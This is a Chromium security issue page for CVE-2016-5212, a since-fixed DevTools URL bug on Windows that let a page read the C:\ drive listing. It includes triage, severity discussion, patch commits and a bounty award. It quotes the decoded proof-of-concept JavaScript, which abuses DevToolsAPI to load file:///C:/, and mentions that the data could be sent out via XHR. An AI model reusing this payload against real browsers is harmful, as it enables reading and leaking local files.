Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Issue 653134 Security: chrome-devtools protocol allows to read the content of C:\ drive
Starred by 2 users Reported by chromium...@gmail.com, Oct 5 2016 Back to list
Status: Fixed
Owner:
Closed: Oct 2016
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment
VERSION
Chrome Version: 55.0.2880.4 canary (64-bit)
Operating System: Windows 7

REPRODUCTION CASE
1. Navigate to the link below.
2. As you can see the page displays the content of C:\ drive.
 
devtools-link.txt
1.7 KB View Download
Recording.mp4
1022 KB View Download
Components: Platform>DevTools
Summary: Security: chrome-devtools protocol allows to read the content of C:\ drive (was: Security: Devtools allows to read the content of C:\ drive)
The repro calls chrome devtools://devtools/remote/serve_rev/@199588/devtools.html?eval(attackcode)

where attack code works out to be:
function f() {c='d="",DevToolsAPI.streamWrite=function(e,o){d+=o},DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0],function(e){d.split("\\n").map(function(e){e.match(/addRow.*;/)&&document.write(e.match(/addRow.*;/)[0]);})});' ;document.write("<script>window.document.write('<script>'+c+'</scr'+'ipt>');</scr"+"ipt>");}if( typeof DevToolsHost == "undefined" ) location.reload();elsef();

This would be interesting if the data in question could be leaked (e.g. instead of document.writing it in text, it instead sent it to a remote server via XHR).

Level of exploitability depends on whether or not Chrome is willing to navigate to such a link in markup or as the source of an IFRAME or whether the attacker needs to convince the user to navigate to it via the address bar.
Labels: Security_Severity-Medium Security_Impact-Stable
Owner: dgozman@chromium.org
Status: Assigned
Exfiltration seems likely, which would make this severity high.
But it appears to require navigation [It would be a bug in itself if web content could open devtools schemes], dropping to medium.


FWIW it's possible to navigate to chrome-devtools schemes from extensions. This means an extension with no permissions will be able to read disk contents.
Labels: -Security_Severity-Medium Security_Severity-High OS-All
Labels: M-53 Pri-1
Project Member Comment 6 by sheriffbot@chromium.org, Oct 13 2016
Labels: -M-53 M-54
Any updates on this bug?
Status: Started
The patch is under review.
Project Member Comment 9 by bugdroid1@chromium.org, Oct 17 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/f865c2dfddb1d95af3a2467587c62566e3f7dfe4

commit f865c2dfddb1d95af3a2467587c62566e3f7dfe4
Author: dgozman <dgozman@chromium.org>
Date: Mon Oct 17 23:35:31 2016

[DevTools] Move sanitize url to devtools_ui.cc.

Compatibility script is not reliable enough.

BUG= 653134 

Review-Url: https://codereview.chromium.org/2403633002
Cr-Commit-Position: refs/heads/master@{#425814}

[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/devtools/devtools_window.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/ui/webui/devtools_ui.h
[add] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/test/BUILD.gn
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/content/renderer/devtools/devtools_client.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/third_party/WebKit/Source/devtools/front_end/Runtime.js
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/third_party/WebKit/Source/devtools/front_end/devtools.js
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/third_party/WebKit/Source/devtools/front_end/screencast/ScreencastView.js

Project Member Comment 10 by bugdroid1@chromium.org, Oct 17 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/f865c2dfddb1d95af3a2467587c62566e3f7dfe4

commit f865c2dfddb1d95af3a2467587c62566e3f7dfe4
Author: dgozman <dgozman@chromium.org>
Date: Mon Oct 17 23:35:31 2016

[DevTools] Move sanitize url to devtools_ui.cc.

Compatibility script is not reliable enough.

BUG= 653134 

Review-Url: https://codereview.chromium.org/2403633002
Cr-Commit-Position: refs/heads/master@{#425814}

[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/devtools/devtools_window.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/ui/webui/devtools_ui.h
[add] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/chrome/test/BUILD.gn
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/content/renderer/devtools/devtools_client.cc
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/third_party/WebKit/Source/devtools/front_end/Runtime.js
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/third_party/WebKit/Source/devtools/front_end/devtools.js
[modify] https://crrev.com/f865c2dfddb1d95af3a2467587c62566e3f7dfe4/third_party/WebKit/Source/devtools/front_end/screencast/ScreencastView.js

Verified on 56.0.2894.0 (Windows). Fixed.
Labels: M-55 Merge-Request-55
Looks like this didn't introduce regressions in canary for a weak. Requesting merge to M55.
Comment 13 by dimu@chromium.org, Oct 24 2016
Labels: -Merge-Request-55 Merge-Approved-55 Hotlist-Merge-Approved
Your change meets the bar and is auto-approved for M55 (branch: 2883)
Project Member Comment 14 by sheriffbot@chromium.org, Oct 25 2016
Status: Fixed
Please mark security bugs as fixed as soon as the fix lands, and before requesting merges. This update is based on the merge- labels applied to this issue. Please reopen if this update was incorrect.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 15 by bugdroid1@chromium.org, Oct 25 2016
Labels: -merge-approved-55 merge-merged-2883
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/528c2bce2ece070826a84392d66169ffe33afdcd

commit 528c2bce2ece070826a84392d66169ffe33afdcd
Author: Dmitry Gozman <dgozman@chromium.org>
Date: Tue Oct 25 18:53:53 2016

Merge to 2883 "[DevTools] Move sanitize url to devtools_ui.cc."
> [DevTools] Move sanitize url to devtools_ui.cc.
>
> Compatibility script is not reliable enough.
>
> BUG= 653134 
>
> Review-Url: https://codereview.chromium.org/2403633002
> Cr-Commit-Position: refs/heads/master@{#425814}
(cherry picked from commit f865c2dfddb1d95af3a2467587c62566e3f7dfe4)
TBR=pfeldman

Review URL: https://codereview.chromium.org/2444423002 .

Cr-Commit-Position: refs/branch-heads/2883@{#289}
Cr-Branched-From: 614d31daee2f61b0180df403a8ad43f20b9f6dd7-refs/heads/master@{#423768}

[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/devtools/devtools_window.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.h
[add] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/test/BUILD.gn
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/content/renderer/devtools/devtools_client.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/Runtime.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/devtools.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/screencast/ScreencastView.js

Project Member Comment 16 by sheriffbot@chromium.org, Oct 26 2016
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
Project Member Comment 18 by bugdroid1@chromium.org, Oct 27 2016
Labels: merge-merged-2840
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/528c2bce2ece070826a84392d66169ffe33afdcd

commit 528c2bce2ece070826a84392d66169ffe33afdcd
Author: Dmitry Gozman <dgozman@chromium.org>
Date: Tue Oct 25 18:53:53 2016

Merge to 2883 "[DevTools] Move sanitize url to devtools_ui.cc."
> [DevTools] Move sanitize url to devtools_ui.cc.
>
> Compatibility script is not reliable enough.
>
> BUG= 653134 
>
> Review-Url: https://codereview.chromium.org/2403633002
> Cr-Commit-Position: refs/heads/master@{#425814}
(cherry picked from commit f865c2dfddb1d95af3a2467587c62566e3f7dfe4)
TBR=pfeldman

Review URL: https://codereview.chromium.org/2444423002 .

Cr-Commit-Position: refs/branch-heads/2883@{#289}
Cr-Branched-From: 614d31daee2f61b0180df403a8ad43f20b9f6dd7-refs/heads/master@{#423768}

[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/devtools/devtools_window.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui.h
[add] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/chrome/test/BUILD.gn
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/content/renderer/devtools/devtools_client.cc
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/Runtime.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/devtools.js
[modify] https://crrev.com/528c2bce2ece070826a84392d66169ffe33afdcd/third_party/WebKit/Source/devtools/front_end/screencast/ScreencastView.js

Labels: -merge-merged-2840
[Automated comment] removing mislabelled merge-merged-2840
Labels: -Hotlist-Merge-Approved
Labels: -reward-topanel reward-unpaid reward-3000
Congratulations, the panel awarded $3,000 for this report!
Labels: -reward-unpaid reward-inprocess
Labels: Release-0-M55
Labels: CVE-2016-5212
Project Member Comment 26 by sheriffbot@chromium.org, Jan 31
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Sign in to add a comment